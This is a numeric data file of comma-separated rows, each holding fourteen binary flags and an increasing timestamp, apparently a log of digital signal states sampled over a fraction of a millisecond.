0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.6680400e-04 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.6682800e-04 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.6685200e-04 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.6687600e-04 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.6690000e-04 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.6692800e-04 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.6695200e-04 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.6698000e-04 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.6700400e-04 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.6702800e-04 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.6705200e-04 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.6707600e-04 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.6710000e-04 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.6712400e-04 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.6715200e-04 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.6718000e-04 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.6720400e-04 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.6722800e-04 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.6725200e-04 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.6727600e-04 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.6730000e-04 0,1,0,0,1,1,0,0,0,1,0,0,0,0,2.6730800e-04 0,1,0,0,1,1,0,0,0,1,0,0,1,0,2.6735200e-04 0,1,0,0,1,1,0,0,0,1,0,0,0,0,2.6738000e-04 0,1,0,0,1,1,0,0,0,0,0,0,0,0,2.6738400e-04 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.6738800e-04 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.6740400e-04 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.6742800e-04 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.6745200e-04 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.6747600e-04 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.6750000e-04 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.6752800e-04 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.6755200e-04 0,1,0,0,1,1,0,0,0,1,0,0,0,0,2.6758000e-04 0,1,0,0,1,1,0,0,0,1,0,0,1,0,2.6760400e-04 0,1,0,0,1,1,0,0,0,1,0,0,0,0,2.6762800e-04 0,1,0,0,1,1,0,0,0,1,0,0,1,0,2.6765200e-04 0,1,0,0,1,1,0,0,0,1,0,0,0,0,2.6767600e-04 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.6768400e-04 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.6772800e-04 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.6775200e-04 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.6780400e-04 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.6782800e-04 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.6785200e-04 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.6787600e-04 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.6790000e-04 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.6792800e-04 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.6795200e-04 0,1,0,0,1,1,0,0,0,1,0,0,0,0,2.6798000e-04 0,1,0,0,1,1,0,0,0,1,0,0,1,0,2.6802800e-04 0,1,0,0,1,1,0,0,0,1,0,0,0,0,2.6805200e-04 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.6806000e-04 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.6807600e-04 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.6810000e-04 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.6812800e-04 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.6815200e-04 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.6818000e-04 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.6820400e-04 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.6822800e-04 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.6825200e-04 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.6827600e-04 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.6830000e-04 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.6832800e-04 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.6835200e-04 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.6838000e-04 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.6840400e-04 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.6842800e-04 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.6845200e-04 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.6847600e-04 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.6850000e-04 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.6852800e-04 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.6855200e-04 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.6858000e-04 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.6860400e-04 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.6862800e-04 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.6865200e-04 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.6867600e-04 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.6870000e-04 0,1,0,0,1,1,0,0,0,1,0,0,0,0,2.6870800e-04 0,1,0,0,1,1,0,0,0,1,0,0,1,0,2.6872800e-04 0,1,0,0,1,1,0,0,0,1,0,0,0,0,2.6875200e-04 0,1,0,0,1,1,0,0,0,1,0,0,1,0,2.6878000e-04 0,1,0,0,1,1,0,0,0,1,0,0,0,0,2.6880400e-04 0,1,0,0,1,1,0,0,0,0,0,0,0,0,2.6880800e-04 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.6881200e-04 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.6885200e-04 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.6887600e-04 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.6892800e-04 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.6895200e-04 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.6898000e-04 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.6900400e-04 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.6902800e-04 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.6905200e-04 0,1,0,0,1,0,0,0,0,1,0,0,0,0,2.6905600e-04 0,1,0,0,1,1,0,0,0,1,0,0,0,0,2.6906000e-04 0,1,0,0,1,1,0,0,0,1,0,0,1,0,2.6910400e-04 0,1,0,0,1,1,0,0,0,1,0,0,0,0,2.6912800e-04 0,1,0,0,1,1,0,0,0,0,0,0,0,0,2.6913200e-04 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.6913600e-04 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.6915200e-04 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.6918000e-04 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.6920400e-04 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.6922800e-04 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.6925200e-04 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.6927600e-04 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.6930000e-04 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.6932800e-04 0,1,0,0,1,1,0,0,0,1,0,0,0,0,2.6933200e-04 0,1,0,0,1,1,0,0,0,1,0,0,1,0,2.6938000e-04 0,1,0,0,1,1,0,0,0,1,0,0,0,0,2.6940400e-04 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.6941200e-04 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.6942800e-04 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.6945200e-04 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.6947600e-04 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.6950000e-04 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.6952800e-04 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.6955200e-04 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.6958000e-04 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.6960400e-04 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.6962800e-04 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.6965200e-04 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.6967600e-04 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.6970000e-04 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.6972800e-04 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.6975200e-04 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.6978000e-04 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.6980400e-04 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.6982800e-04 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.6985200e-04 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.6987600e-04 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.6990000e-04 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.6992800e-04 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.6995200e-04 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.6998000e-04 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.7000400e-04 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.7002800e-04 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.7005200e-04 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.7007600e-04 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.7010000e-04 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.7012800e-04 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.7015200e-04 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.7018000e-04 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.7020400e-04 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.7022800e-04 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.7025200e-04 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.7027600e-04 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.7030000e-04 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.7032800e-04 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.7035200e-04 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.7038000e-04 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.7040400e-04 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.7042800e-04 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.7045200e-04 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.7047600e-04 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.7050000e-04 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.7052800e-04 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.7055200e-04 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.7058000e-04 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.7060400e-04 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.7062800e-04 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.7065200e-04 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.7067600e-04 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.7070000e-04 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.7072800e-04 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.7075200e-04 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.7078000e-04 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.7080400e-04 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.7082800e-04 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.7085200e-04 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.7087600e-04 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.7090000e-04 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.7092800e-04 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.7095200e-04 0,1,0,0,1,1,0,0,0,1,0,0,0,0,2.7095600e-04 0,1,0,0,1,1,0,0,0,1,0,0,0,1,3.9551600e-04 1,1,0,0,1,1,0,0,0,1,0,0,0,1,3.9573200e-04 1,1,0,0,1,1,0,0,0,1,0,1,0,1,3.9576000e-04 1,1,0,0,1,1,0,0,0,1,0,0,0,1,3.9578000e-04 1,1,0,0,1,1,0,0,0,1,0,0,1,1,3.9610000e-04 1,1,0,0,1,1,0,0,0,1,0,0,0,1,3.9612800e-04 1,1,0,0,1,0,0,0,0,0,0,0,0,1,3.9613200e-04 1,1,0,0,1,0,0,0,0,0,0,0,1,1,3.9615200e-04 1,1,0,0,1,0,0,0,0,0,0,0,0,1,3.9618000e-04 1,1,0,0,1,0,0,0,0,0,0,0,1,1,3.9620400e-04 1,1,0,0,1,0,0,0,0,0,0,0,0,1,3.9622800e-04 1,1,0,0,1,0,0,0,0,0,0,0,1,1,3.9625200e-04 1,1,0,0,1,0,0,0,0,0,0,0,0,1,3.9627600e-04 1,1,0,0,1,0,0,0,0,0,0,0,1,1,3.9630400e-04 1,1,0,0,1,0,0,0,0,0,0,0,0,1,3.9632800e-04 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.9634800e-04 1,1,0,0,1,0,0,0,0,0,0,0,1,0,3.9635200e-04 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.9638000e-04 1,1,0,0,1,0,0,0,0,0,0,0,1,0,3.9640400e-04 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.9642800e-04 1,1,0,0,1,0,0,0,0,0,0,0,1,0,3.9645200e-04 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.9647600e-04 1,1,0,0,1,0,0,0,0,0,0,0,1,0,3.9650400e-04 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.9652800e-04 1,1,0,0,1,0,0,0,0,0,0,0,1,0,3.9655200e-04 1,1,0,0,1,1,0,0,0,1,0,0,0,0,3.9658000e-04 1,1,0,0,1,1,0,0,0,1,0,0,1,0,3.9662800e-04 1,1,0,0,1,1,0,0,0,1,0,0,0,0,3.9665200e-04 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.9666000e-04 1,1,0,0,1,0,0,0,0,0,0,0,1,0,3.9667600e-04 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.9670800e-04 1,1,0,0,1,0,0,0,0,0,0,0,1,0,3.9672800e-04 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.9675200e-04 1,1,0,0,1,0,0,0,0,0,0,0,1,0,3.9678000e-04 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.9680400e-04 1,1,0,0,1,1,0,0,0,1,0,0,0,0,3.9680800e-04 1,1,0,0,1,1,0,0,0,1,0,0,1,0,3.9685200e-04 1,1,0,0,1,1,0,0,0,1,0,0,0,0,3.9687600e-04 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.9688400e-04 1,1,0,0,1,0,0,0,0,0,0,0,1,0,3.9690400e-04 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.9692800e-04 1,1,0,0,1,0,0,0,0,0,0,0,1,0,3.9695200e-04 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.9698000e-04 1,1,0,0,1,0,0,0,0,0,0,0,1,0,3.9700400e-04 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.9702800e-04 1,1,0,0,1,0,0,0,0,0,0,0,1,0,3.9705200e-04 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.9707600e-04 1,1,0,0,1,0,0,0,0,0,0,0,1,0,3.9712800e-04 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.9715200e-04 1,1,0,0,1,0,0,0,0,0,0,0,1,0,3.9718000e-04 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.9720400e-04 1,1,0,0,1,1,0,0,0,1,0,0,0,0,3.9720800e-04 1,1,0,0,1,1,0,0,0,1,0,0,1,0,3.9725200e-04 1,1,0,0,1,1,0,0,0,1,0,0,0,0,3.9727600e-04 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.9728400e-04 1,1,0,0,1,0,0,0,0,0,0,0,1,0,3.9730000e-04 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.9732800e-04 1,1,0,0,1,0,0,0,0,0,0,0,1,0,3.9735200e-04 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.9738000e-04 1,1,0,0,1,0,0,0,0,0,0,0,1,0,3.9740400e-04 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.9742800e-04 1,1,0,0,1,0,0,0,0,0,0,0,1,0,3.9745200e-04 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.9747600e-04 1,1,0,0,1,1,0,0,0,1,0,0,0,0,3.9748400e-04 1,1,0,0,1,1,0,0,0,1,0,0,1,0,3.9752800e-04 1,1,0,0,1,1,0,0,0,1,0,0,0,0,3.9755200e-04 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.9756000e-04 1,1,0,0,1,0,0,0,0,0,0,0,1,0,3.9758000e-04 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.9760400e-04 1,1,0,0,1,0,0,0,0,0,0,0,1,0,3.9762800e-04 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.9765200e-04 1,1,0,0,1,0,0,0,0,1,0,0,0,0,3.9765600e-04 1,1,0,0,1,1,0,0,0,1,0,0,0,0,3.9766000e-04 1,1,0,0,1,1,0,0,0,1,0,0,1,0,3.9770800e-04 1,1,0,0,1,1,0,0,0,1,0,0,0,0,3.9772800e-04 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.9774000e-04 1,1,0,0,1,0,0,0,0,0,0,0,1,0,3.9775600e-04 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.9778000e-04 1,1,0,0,1,0,0,0,0,0,0,0,1,0,3.9780400e-04 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.9782800e-04 1,1,0,0,1,0,0,0,0,0,0,0,1,0,3.9785200e-04 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.9787600e-04 1,1,0,0,1,0,0,0,0,0,0,0,1,0,3.9792800e-04 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.9795200e-04 1,1,0,0,1,0,0,0,0,0,0,0,1,0,3.9798000e-04 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.9800400e-04 1,1,0,0,1,0,0,0,0,0,0,0,1,0,3.9805200e-04 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.9808000e-04 1,1,0,0,1,0,0,0,0,0,0,0,1,0,3.9810800e-04 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.9813200e-04 1,1,0,0,1,0,0,0,0,0,0,0,1,0,3.9815600e-04 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.9818000e-04 1,1,0,0,1,0,0,0,0,0,0,0,1,0,3.9820400e-04 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.9822800e-04 1,1,0,0,1,0,0,0,0,0,0,0,1,0,3.9825200e-04 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.9828000e-04 1,1,0,0,1,1,0,0,0,1,0,0,0,0,3.9828400e-04 1,1,0,0,1,1,0,0,0,1,0,0,1,0,3.9833200e-04 1,1,0,0,1,1,0,0,0,1,0,0,0,0,3.9835600e-04 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.9836400e-04 1,1,0,0,1,0,0,0,0,0,0,0,1,0,3.9838000e-04 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.9840400e-04 1,1,0,0,1,1,0,0,0,1,0,0,0,0,3.9841200e-04 1,1,0,0,1,1,0,0,0,1,0,0,1,0,3.9845600e-04 1,1,0,0,1,1,0,0,0,1,0,0,0,0,3.9848000e-04 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.9848800e-04 1,1,0,0,1,0,0,0,0,0,0,0,1,0,3.9850800e-04 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.9853200e-04 1,1,0,0,1,0,0,0,0,0,0,0,1,0,3.9855600e-04 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.9858000e-04 1,1,0,0,1,0,0,0,0,0,0,0,1,0,3.9860400e-04 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.9862800e-04 1,1,0,0,1,0,0,0,0,0,0,0,1,0,3.9865600e-04 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.9868000e-04 1,1,0,0,1,1,0,0,0,1,0,0,0,0,3.9868400e-04 1,1,0,0,1,1,0,0,0,1,0,0,1,0,3.9873200e-04 1,1,0,0,1,1,0,0,0,1,0,0,0,0,3.9875600e-04 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.9876400e-04 1,1,0,0,1,0,0,0,0,0,0,0,1,0,3.9878000e-04 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.9880400e-04 1,1,0,0,1,0,0,0,0,0,0,0,1,0,3.9882800e-04 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.9885200e-04 1,1,0,0,1,0,0,0,0,0,0,0,1,0,3.9888000e-04 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.9890800e-04 1,1,0,0,1,0,0,0,0,0,0,0,1,0,3.9893200e-04 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.9895600e-04 1,1,0,0,1,0,0,0,0,0,0,0,1,0,3.9898000e-04 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.9900400e-04 1,1,0,0,1,0,0,0,0,0,0,0,1,0,3.9902800e-04 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.9905600e-04 1,1,0,0,1,0,0,0,0,0,0,0,1,0,3.9908000e-04 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.9910800e-04 1,1,0,0,1,0,0,0,0,0,0,0,1,0,3.9913200e-04 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.9915600e-04 1,1,0,0,1,0,0,0,0,0,0,0,1,0,3.9918000e-04 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.9920400e-04 1,1,0,0,1,0,0,0,0,0,0,0,1,0,3.9922800e-04 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.9925600e-04 1,1,0,0,1,0,0,0,0,0,0,0,1,0,3.9928000e-04 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.9930400e-04 1,1,0,0,1,1,0,0,0,1,0,0,0,0,3.9930800e-04 1,1,0,0,1,1,0,0,0,1,0,0,1,0,3.9935600e-04 1,1,0,0,1,1,0,0,0,1,0,0,0,0,3.9938000e-04 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.9938800e-04 1,1,0,0,1,0,0,0,0,0,0,0,1,0,3.9940400e-04 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.9942800e-04 1,1,0,0,1,0,0,0,0,0,0,0,1,0,3.9945200e-04 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.9947600e-04 1,1,0,0,1,0,0,0,0,0,0,0,1,0,3.9950000e-04 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.9952800e-04 1,1,0,0,1,0,0,0,0,0,0,0,1,0,3.9958000e-04 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.9960400e-04 1,1,0,0,1,0,0,0,0,0,0,0,1,0,3.9962800e-04 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.9965200e-04 1,1,0,0,1,0,0,0,0,0,0,0,1,0,3.9967600e-04 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.9970000e-04 1,1,0,0,1,1,0,0,0,1,0,0,0,0,3.9970800e-04 1,1,0,0,1,1,0,0,0,1,0,0,1,0,3.9972800e-04 1,1,0,0,1,1,0,0,0,1,0,0,0,0,3.9975200e-04 1,1,0,0,1,1,0,0,0,1,0,0,1,0,3.9978000e-04 1,1,0,0,1,1,0,0,0,1,0,0,0,0,3.9980400e-04 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.9981200e-04 1,1,0,0,1,0,0,0,0,0,0,0,1,0,3.9985200e-04 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.9987600e-04 1,1,0,0,1,0,0,0,0,0,0,0,1,0,3.9990000e-04 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.9992800e-04 1,1,0,0,1,0,0,0,0,0,0,0,1,0,3.9995200e-04 1,1,0,0,1,1,0,0,0,1,0,0,0,0,3.9998000e-04 1,1,0,0,1,1,0,0,0,1,0,0,1,0,4.0002800e-04 1,1,0,0,1,1,0,0,0,1,0,0,0,0,4.0005200e-04 1,1,0,0,1,0,0,0,0,0,0,0,0,0,4.0006000e-04 1,1,0,0,1,0,0,0,0,0,0,0,1,0,4.0007600e-04 1,1,0,0,1,0,0,0,0,0,0,0,0,0,4.0010000e-04 1,1,0,0,1,0,0,0,0,0,0,0,1,0,4.0012800e-04 1,1,0,0,1,0,0,0,0,0,0,0,0,0,4.0015200e-04 1,1,0,0,1,0,0,0,0,0,0,0,1,0,4.0018000e-04 1,1,0,0,1,0,0,0,0,0,0,0,0,0,4.0020400e-04 1,1,0,0,1,0,0,0,0,0,0,0,1,0,4.0025200e-04 1,1,0,0,1,0,0,0,0,0,0,0,0,0,4.0027600e-04 1,1,0,0,1,0,0,0,0,0,0,0,1,0,4.0030000e-04 1,1,0,0,1,0,0,0,0,0,0,0,0,0,4.0032800e-04 1,1,0,0,1,0,0,0,0,0,0,0,1,0,4.0034800e-04 1,1,0,0,1,0,0,0,0,0,0,0,0,0,4.0037600e-04 1,1,0,0,1,0,0,0,0,0,0,0,1,0,4.0040000e-04 1,1,0,0,1,0,0,0,0,0,0,0,0,0,4.0042800e-04 1,1,0,0,1,0,0,0,0,0,0,0,1,0,4.0045200e-04 1,1,0,0,1,0,0,0,0,0,0,0,0,0,4.0047600e-04 1,1,0,0,1,0,0,0,0,0,0,0,1,0,4.0050000e-04 1,1,0,0,1,0,0,0,0,0,0,0,0,0,4.0052400e-04 1,1,0,0,1,0,0,0,0,0,0,0,1,0,4.0054800e-04 1,1,0,0,1,0,0,0,0,0,0,0,0,0,4.0057600e-04 1,1,0,0,1,0,0,0,0,0,0,0,1,0,4.0060000e-04 1,1,0,0,1,0,0,0,0,0,0,0,0,0,4.0062400e-04 1,1,0,0,1,0,0,0,0,0,0,0,1,0,4.0065200e-04 1,1,0,0,1,0,0,0,0,0,0,0,0,0,4.0067600e-04 1,1,0,0,1,0,0,0,0,0,0,0,1,0,4.0072400e-04 1,1,0,0,1,0,0,0,0,0,0,0,0,0,4.0074800e-04 1,1,0,0,1,0,0,0,0,0,0,0,1,0,4.0077600e-04 1,1,0,0,1,0,0,0,0,0,0,0,0,0,4.0080000e-04 1,1,0,0,1,0,0,0,0,0,0,0,1,0,4.0082400e-04 1,1,0,0,1,1,0,0,0,1,0,0,0,0,4.0085200e-04 1,1,0,0,1,1,0,0,0,1,0,0,1,0,4.0087600e-04 1,1,0,0,1,1,0,0,0,1,0,0,0,0,4.0090000e-04 1,1,0,0,1,1,0,0,0,1,0,0,1,0,4.0092400e-04 1,1,0,0,1,1,0,0,0,1,0,0,0,0,4.0094800e-04 1,1,0,0,1,0,0,0,0,0,0,0,0,0,4.0095600e-04 1,1,0,0,1,0,0,0,0,0,0,0,1,0,4.0100000e-04 1,1,0,0,1,0,0,0,0,0,0,0,0,0,4.0102800e-04 1,1,0,0,1,0,0,0,0,0,0,0,1,0,4.0105200e-04 1,1,0,0,1,0,0,0,0,0,0,0,0,0,4.0107600e-04 1,1,0,0,1,1,0,0,0,1,0,0,0,0,4.0108000e-04 1,1,0,0,1,1,0,0,0,1,0,0,1,0,4.0112400e-04 1,1,0,0,1,1,0,0,0,1,0,0,0,0,4.0114800e-04 1,1,0,0,1,0,0,0,0,0,0,0,0,0,4.0115600e-04 1,1,0,0,1,0,0,0,0,0,0,0,1,0,4.0117600e-04 1,1,0,0,1,0,0,0,0,0,0,0,0,0,4.0120000e-04 1,1,0,0,1,0,0,0,0,0,0,0,1,0,4.0122400e-04 1,1,0,0,1,0,0,0,0,0,0,0,0,0,4.0125200e-04 1,1,0,0,1,0,0,0,0,0,0,0,1,0,4.0127600e-04 1,1,0,0,1,0,0,0,0,0,0,0,0,0,4.0130000e-04 1,1,0,0,1,0,0,0,0,0,0,0,1,0,4.0132400e-04 1,1,0,0,1,0,0,0,0,0,0,0,0,0,4.0134800e-04 1,1,0,0,1,1,0,0,0,1,0,0,0,0,4.0135600e-04 1,1,0,0,1,1,0,0,0,1,0,0,1,0,4.0140000e-04 1,1,0,0,1,1,0,0,0,1,0,0,0,0,4.0142800e-04 1,1,0,0,1,1,0,0,0,0,0,0,0,0,4.0143200e-04 1,1,0,0,1,0,0,0,0,0,0,0,0,0,4.0143600e-04 1,1,0,0,1,0,0,0,0,0,0,0,1,0,4.0145200e-04 1,1,0,0,1,0,0,0,0,0,0,0,0,0,4.0147600e-04 1,1,0,0,1,0,0,0,0,0,0,0,1,0,4.0150000e-04 1,1,0,0,1,0,0,0,0,0,0,0,0,0,4.0152400e-04 